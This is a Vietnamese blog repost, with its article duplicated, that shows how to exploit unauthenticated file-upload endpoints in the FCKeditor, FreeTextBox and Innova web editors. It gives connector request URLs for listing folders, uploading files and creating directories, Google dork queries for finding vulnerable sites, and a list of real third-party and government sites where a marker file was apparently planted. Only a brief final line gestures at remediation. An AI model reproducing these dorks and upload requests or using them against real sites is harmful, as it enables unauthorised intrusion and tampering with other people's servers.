NguồnTìm được cái này qua Google, thấy hay hay. Cho những ai thích thử cảm giác hacker.
Hack lỗi upload qua editor
Trong nhiều bài viết của tôi, tôi đã đề cập đến việc sử dụng phần mềm mặc định, đặc biệt là các phần mềm mã mở.
Bài này tôi để cập đến lỗi có thể khai thác trực tiếp được, thông qua upload file.
Các web site thường dùng các editor cho phần biên tập, phổ biến là : FCK, FreetextBox, HtmlArea, Inova Editor,...
Bản thân các editor này cho phép upload file, khi lập trình các coder mắc phải các lỗi sau khiến có thể bị khai thác:
- Không xóa ví dụ mẫu, các phần không cần thiết
- Không chứng thực các phần này (thường dành cho admin,...)
- Không đổi tên --> dễ dàng dò ra cấu trúc thư mục
- Không filter loại file
Attacker có thể tấn công theo cách như sau :
- Dùng google
- Dò cấu trúc thư mục --> bây giờ mới thấy cái này quan trọng
Trong bài này tôi demo 3 loại editor phổ biến và dùng google.
1. Khai thác FCK Editor
Các link có thể khai thác được, tùy site mà bạn đổi tên site và connector đi nhé.
http://www.fckeditor.net/fckeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/php/connector.php
http://www.fckeditor.net/fckeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/asp/connector.asp
http://www.fckeditor.net/fckeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/aspx/connector.aspx
http://www.fckeditor.net/fckeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/cfm/connector.cfm
http://www.fckeditor.net/fckeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/perl/connector.pl
http://www.fckeditor.net/FCKeditor/editor/filemanager/browser/default/connectors/test.html
List other file : set Type=
http://www.fckeditor.net/fckeditor/editor/filemanager/browser/default/browser.html?Type=&Connector=connectors/php/connector.php
-->http://www.fckeditor.net/fckeditor/editor/filemanager/browser/default/connectors/php/connector.php?Command=GetFoldersAndFiles&Type=File&CurrentFolder=/
/fckeditor/editor/filemanager
/browser/default/browser.html?Type=&Connector=connectors/aspx/connector.aspx
/fckeditor/editor/filemanager/browser/default/connectors/php/connector.php?Command=GetFoldersAndFiles&Type=File&CurrentFolder=/
Post file :
http://www.fckeditor.net/fckeditor/editor/filemanager/browser/default/connectors/php/connector.php?Command=FileUpload&Type=Image&CurrentFolder=/
Mac dinh file dc dat trong : UserFiles\File ...
List thu muc :
Vi du /Earth/
http://www.fckeditor.net/fckeditor/editor/filemanager/browser/default/connectors/php/connector.php?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/Earth/
Get file infor - tim vi tri cua file sau khi upload :
http://www.fckeditor.net/fckeditor/editor/filemanager/browser/default/connectors/php/connector.php?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/
Tao thu muc moi :
http://www.fckeditor.net/fckeditor/editor/filemanager/browser/default/connectors/php/connector.php?Command=CreateFolder&Type=Image&CurrentFolder=/&NewFolderName=test
http://www.fckeditor.net/fckeditor/editor/filemanager/browser/default/connectors/php/connector.php?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/
Có thể dùng google để tìm các link kiểu như trên.
VD : inurl:filemanager/upload/test.html
....
Ví dụ site :
http://blogs.webtide.com/FCKeditor/editor/filemanager/upload/test.html
2. Dùng FreeTextBox file cho phép upload : ftb.imagegallery.aspx
Vậy chỉ cần tìm trên google theo từ khóa là ra cả đống
inurl:ftb.imagegallery.aspx
http://www.in.gov/ism/images/kikicoco.txt
http://www.investhk.gov.hk/Upload/News/kikicoco.jpg
http://www.investhk.gov.hk/Upload/MenuIcon/kikicoco.jpg
3. Dùng Innova Editor
File cho phép upload : assetmanager.asp
Tìm google : inurl:assetmanager.asp
VD :
http://www.lanwar.com/Images/lw/kikicoco.txt
http://www.mywebsitepromotions.com/upload/kikicoco.jpg
http://www.sepetix.com.tr/Images/kikicoco.txt
http://www.verizonheritage.com/Editor/asse...co/kikicoco.txt
http://www.chulabook.com/Editor/assets/kikicoco.jpg
http://www.battenberg.com/Editor/assets/kikicoco.jpg
http://pca.civiccommunicator.com
http://www.farukcubukcu.com
http://www.fielddataonline.com
http://www.wizardofads.com
http://www.demo.dmxready.com
http://blackchristianmovies.com
http://www.orhri.com
http://s135407385.onlinehome.us
http://www.isidorusweb.nl
===> các coder đã biết phải làm gì rồi đúng không ?
Phạm Đức Hải
Bài này tôi để cập đến lỗi có thể khai thác trực tiếp được, thông qua upload file.
Các web site thường dùng các editor cho phần biên tập, phổ biến là : FCK, FreetextBox, HtmlArea, Inova Editor,...
Bản thân các editor này cho phép upload file, khi lập trình các coder mắc phải các lỗi sau khiến có thể bị khai thác:
- Không xóa ví dụ mẫu, các phần không cần thiết
- Không chứng thực các phần này (thường dành cho admin,...)
- Không đổi tên --> dễ dàng dò ra cấu trúc thư mục
- Không filter loại file
Attacker có thể tấn công theo cách như sau :
- Dùng google
- Dò cấu trúc thư mục --> bây giờ mới thấy cái này quan trọng
Trong bài này tôi demo 3 loại editor phổ biến và dùng google.
1. Khai thác FCK Editor
Các link có thể khai thác được, tùy site mà bạn đổi tên site và connector đi nhé.
http://www.fckeditor.net/fckeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/php/connector.php
http://www.fckeditor.net/fckeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/asp/connector.asp
http://www.fckeditor.net/fckeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/aspx/connector.aspx
http://www.fckeditor.net/fckeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/cfm/connector.cfm
http://www.fckeditor.net/fckeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/perl/connector.pl
http://www.fckeditor.net/FCKeditor/editor/filemanager/browser/default/connectors/test.html
List other file : set Type=
http://www.fckeditor.net/fckeditor/editor/filemanager/browser/default/browser.html?Type=&Connector=connectors/php/connector.php
-->http://www.fckeditor.net/fckeditor/editor/filemanager/browser/default/connectors/php/connector.php?Command=GetFoldersAndFiles&Type=File&CurrentFolder=/
/fckeditor/editor/filemanager
/browser/default/browser.html?Type=&Connector=connectors/aspx/connector.aspx
/fckeditor/editor/filemanager/browser/default/connectors/php/connector.php?Command=GetFoldersAndFiles&Type=File&CurrentFolder=/
Post file :
http://www.fckeditor.net/fckeditor/editor/filemanager/browser/default/connectors/php/connector.php?Command=FileUpload&Type=Image&CurrentFolder=/
Mac dinh file dc dat trong : UserFiles\File ...
List thu muc :
Vi du /Earth/
http://www.fckeditor.net/fckeditor/editor/filemanager/browser/default/connectors/php/connector.php?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/Earth/
Get file infor - tim vi tri cua file sau khi upload :
http://www.fckeditor.net/fckeditor/editor/filemanager/browser/default/connectors/php/connector.php?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/
Tao thu muc moi :
http://www.fckeditor.net/fckeditor/editor/filemanager/browser/default/connectors/php/connector.php?Command=CreateFolder&Type=Image&CurrentFolder=/&NewFolderName=test
http://www.fckeditor.net/fckeditor/editor/filemanager/browser/default/connectors/php/connector.php?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/
Có thể dùng google để tìm các link kiểu như trên.
VD : inurl:filemanager/upload/test.html
....
Ví dụ site :
http://blogs.webtide.com/FCKeditor/editor/filemanager/upload/test.html
2. Dùng FreeTextBox file cho phép upload : ftb.imagegallery.aspx
Vậy chỉ cần tìm trên google theo từ khóa là ra cả đống
inurl:ftb.imagegallery.aspx
http://www.in.gov/ism/images/kikicoco.txt
http://www.investhk.gov.hk/Upload/News/kikicoco.jpg
http://www.investhk.gov.hk/Upload/MenuIcon/kikicoco.jpg
3. Dùng Innova Editor
File cho phép upload : assetmanager.asp
Tìm google : inurl:assetmanager.asp
VD :
http://www.lanwar.com/Images/lw/kikicoco.txt
http://www.mywebsitepromotions.com/upload/kikicoco.jpg
http://www.sepetix.com.tr/Images/kikicoco.txt
http://www.verizonheritage.com/Editor/asse...co/kikicoco.txt
http://www.chulabook.com/Editor/assets/kikicoco.jpg
http://www.battenberg.com/Editor/assets/kikicoco.jpg
http://pca.civiccommunicator.com
http://www.farukcubukcu.com
http://www.fielddataonline.com
http://www.wizardofads.com
http://www.demo.dmxready.com
http://blackchristianmovies.com
http://www.orhri.com
http://s135407385.onlinehome.us
http://www.isidorusweb.nl
===> các coder đã biết phải làm gì rồi đúng không ?
Phạm Đức Hải
Test thử phát:
Dùng google search từ khóa "inurl:ftb.imagegallery.aspx"
Và sau đây là kết quả:
Dùng google search từ khóa "inurl:browser/default/browser.html"
Buồn ngủ quá, muốn làm hacker thì hay thức khuya, thôi chả dại.
Share This
Subscribe Here
0 nhận xét:
Post a Comment